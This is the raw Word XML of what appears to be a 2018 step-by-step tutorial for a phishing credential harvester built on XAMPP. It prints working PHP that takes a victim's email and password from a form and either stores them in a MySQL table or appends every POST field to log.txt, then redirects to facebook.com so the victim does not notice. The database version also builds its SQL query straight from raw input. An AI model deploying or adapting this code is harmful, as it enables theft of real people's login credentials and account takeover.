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3C0AF" w14:textId="512ED1BA" w:rsidR="00454D70" w:rsidRDefault="00454D70" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C309AE0" w14:textId="05DBCB65" w:rsidR="00454D70" w:rsidRDefault="00454D70" w:rsidP="00454D70">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454D70">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>//first method in which info is saved in MySql Db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C168B46" w14:textId="77777777" w:rsidR="00454D70" w:rsidRDefault="00454D70" w:rsidP="00454D70">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE863E7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 xml:space="preserve">&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C898A8E" w14:textId="6AA4D93C" w:rsidR="00454D70" w:rsidRPr="00454D70" w:rsidRDefault="00454D70" w:rsidP="00454D70">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B41454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>$link = mysqli_connect('localhost','root','');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CA01F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>if (!$link) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917BBA5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 xml:space="preserve">    die('Could not connect: ' . mysqli_error());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E86A8D9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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0842B5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>$db_select = mysqli_select_db($link, 'dummy');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF3E43B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>if (!$db_select) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29879A67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 xml:space="preserve">    die("Database selection failed: " . mysqli_error());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456E63DF" w14:textId="7CCF93C1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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA490A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>$email=$_POST['email'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0D51B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>$pass = $_POST['pass'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F7DA8C" w14:textId="5E147BAF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 xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00454D70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$stmt=mysqli_query($link,"insert into registration( email, pass) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1787F29F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ab/>
      </w:r>
      <w:r w:rsidRPr="00454D70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>values('$email','$pass')");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B63EC2" w14:textId="5E18F0CB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  <w:t>if ($stmt) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189254F2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  <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D191CB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  <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D2F655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  <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240EFB3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  <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0038712F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  <w:t>&lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0750C59D" w14:textId="4CC4EB9F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  <w:t>&lt;title&gt;HACKER POINT&lt;/title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00454D70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B9D190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  <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A94FD2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  <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0167F46C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  <w:t>&lt;div align="center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2592B32B" w14:textId="39901B83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  <w:t>&lt;h1&gt;Thankyou for your help &lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F04B88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  <w:t>&lt;b &gt; CONGRATULATIONS your account has been successfully hacked.&lt;br&gt;Your EMAIL ID is &lt;?php echo $email; ?&gt;  and PASSWORD is &lt;?php echo $pass; ?&gt; &lt;/b&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01574971" w14:textId="0B47F8DC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  <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA93757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  <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95934E" w14:textId="6322D0F5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  <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E40D021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</w:r>
      <w:r w:rsidRPr="00454D70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B667A5" w14:textId="67E9F55D" w:rsidR="00454D70" w:rsidRDefault="00454D70" w:rsidP="00454D70">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454D70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00454D70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7DF010" w14:textId="557E98BD" w:rsidR="00454D70" w:rsidRPr="00454D70" w:rsidRDefault="00454D70" w:rsidP="00454D70">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454D70">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>//second method in which info is save in log file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720505EC" w14:textId="77777777" w:rsidR="00454D70" w:rsidRPr="00454D70" w:rsidRDefault="00454D70" w:rsidP="00454D70">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C12186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>header('Location:http://www.facebook.com');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2FF603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>$handle=fopen("log.txt","a");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD8CE2" w14:textId="77777777" w:rsidR="00454D70" w:rsidRPr="00454D70" w:rsidRDefault="00454D70" w:rsidP="00454D70">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411291FE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>foreach($_POST as $variable=&gt;$value){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00779997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ab/>
        <w:t>fwrite($handle,$variable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074BE0F1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ab/>
        <w:t>fwrite($handle,"=");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501420A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ab/>
        <w:t>fwrite($handle,$value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F395D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ab/>
        <w:t>fwrite($handle,"\r\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265857B3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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262944FC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>fwrite($handle,"\r\n\n\n\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1848364D" w14:textId="77777777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>fclose($handle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF7F6EA" w14:textId="19737155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>exit;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C84805" w14:textId="77777777" w:rsidR="00454D70" w:rsidRPr="00454D70" w:rsidRDefault="00454D70" w:rsidP="00454D70">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B570F6" w14:textId="387FDFED" w:rsidR="00454D70" w:rsidRPr="00454D70" w:rsidRDefault="00454D70" w:rsidP="00454D70">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454D70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2CD47C" w14:textId="243D8516" w:rsidR="00A97C92" w:rsidRPr="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97C92">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Method 1</w:t>
      </w:r>
      <w:r w:rsidR="00B82D4E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidRPr="00A97C92">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Using Xampp Server and MySql DB Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77588EE0" w14:textId="172C463E" w:rsidR="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Step1 :User enter his login credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529E6BF" w14:textId="557A11FE" w:rsidR="00A97C92" w:rsidRDefault="00F46C68" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6708C35D" wp14:editId="297BF262">
            <wp:extent cx="6931025" cy="3896995"/>
            <wp:effectExtent l="0" t="0" r="317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91AE" w14:textId="77777777" w:rsidR="00EE2A84" w:rsidRDefault="00EE2A84" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000E9D3B" w14:textId="337E884B" w:rsidR="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Step2:</w:t>
      </w:r>
      <w:r w:rsidR="00CF7E61">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Credentials are saved in the DB server and he is redirected to another webpage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183F750C" w14:textId="77777777" w:rsidR="00EE2A84" w:rsidRDefault="00EE2A84" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B872C7" w14:textId="471125CC" w:rsidR="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50B32619" wp14:editId="675EAA5B">
            <wp:extent cx="6931025" cy="3896995"/>
            <wp:effectExtent l="0" t="0" r="317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CBA3B" w14:textId="704720A9" w:rsidR="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97C92">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">MySQL DB Server  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BCE090" w14:textId="7939F985" w:rsidR="00A97C92" w:rsidRPr="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Credentials are saved in the DB having table name registeration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A4D01" w14:textId="0A09D175" w:rsidR="00182675" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6660847A" wp14:editId="00653691">
            <wp:extent cx="6931025" cy="389699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525FC" w14:textId="017EFC08" w:rsidR="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="71AF9864" w14:textId="41FB37A7" w:rsidR="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00E65A9C">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97C92">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Method </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A97C92">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B82D4E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002446F4">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A97C92">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Using Xampp Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">and file methods </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F266D0E" w14:textId="12280097" w:rsidR="00A97C92" w:rsidRPr="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Step1 :User enter</w:t>
      </w:r>
      <w:r w:rsidR="009702B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> his login credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFD247F" w14:textId="5C0BC545" w:rsidR="00A97C92" w:rsidRDefault="00F46C68" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AFECC1F" wp14:editId="5D3468F4">
            <wp:extent cx="6931025" cy="3896995"/>
            <wp:effectExtent l="0" t="0" r="317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F03D" w14:textId="149EC703" w:rsidR="00A97C92" w:rsidRPr="00A97C92" w:rsidRDefault="00A97C92" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step2:</w:t>
      </w:r>
      <w:r w:rsidR="00194BEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Credentials are saved in the log.txt file and he is redirected to original webpage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C41EF00" w14:textId="6B34FFD8" w:rsidR="00040706" w:rsidRPr="00040706" w:rsidRDefault="00F46C68" w:rsidP="00A97C92">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BA2BE0D" wp14:editId="0304FDDB">
            <wp:extent cx="6931025" cy="3896995"/>
            <wp:effectExtent l="0" t="0" r="317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981E" w14:textId="77777777" w:rsidR="00040706" w:rsidRDefault="00040706" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2BCAE8" w14:textId="0E9B239B" w:rsidR="00F46C68" w:rsidRDefault="00040706" w:rsidP="00A97C92">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040706">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>log.txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271F0D2C" w14:textId="6825BA8C" w:rsidR="00040706" w:rsidRPr="00040706" w:rsidRDefault="00040706" w:rsidP="00A97C92">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Credentials are saved in log.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC6C276" w14:textId="022E1761" w:rsidR="00F46C68" w:rsidRPr="00A97C92" w:rsidRDefault="00040706" w:rsidP="00A97C92">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EC29909" wp14:editId="3C68769C">
            <wp:extent cx="6591300" cy="4229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" t="7328" r="3527" b="2294"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="65913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6C68" w:rsidRPr="00A97C92" w:rsidSect="00A97C92">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="851" w:right="424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75"/>
    <w:rsid w:val="00040706"/>
    <w:rsid w:val="00182675"/>
    <w:rsid w:val="00194BEF"/>
    <w:rsid w:val="002446F4"/>
    <w:rsid w:val="00454D70"/>
    <w:rsid w:val="009702B2"/>
    <w:rsid w:val="00A97C92"/>
    <w:rsid w:val="00B82D4E"/>
    <w:rsid w:val="00CF7E61"/>
    <w:rsid w:val="00E65A9C"/>
    <w:rsid w:val="00EE2A84"/>
    <w:rsid w:val="00F4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C786"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D0A43F08-DA02-4E43-B442-BC416D68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Mishra</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Avinash Mishra</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-14T11:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-14T11:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>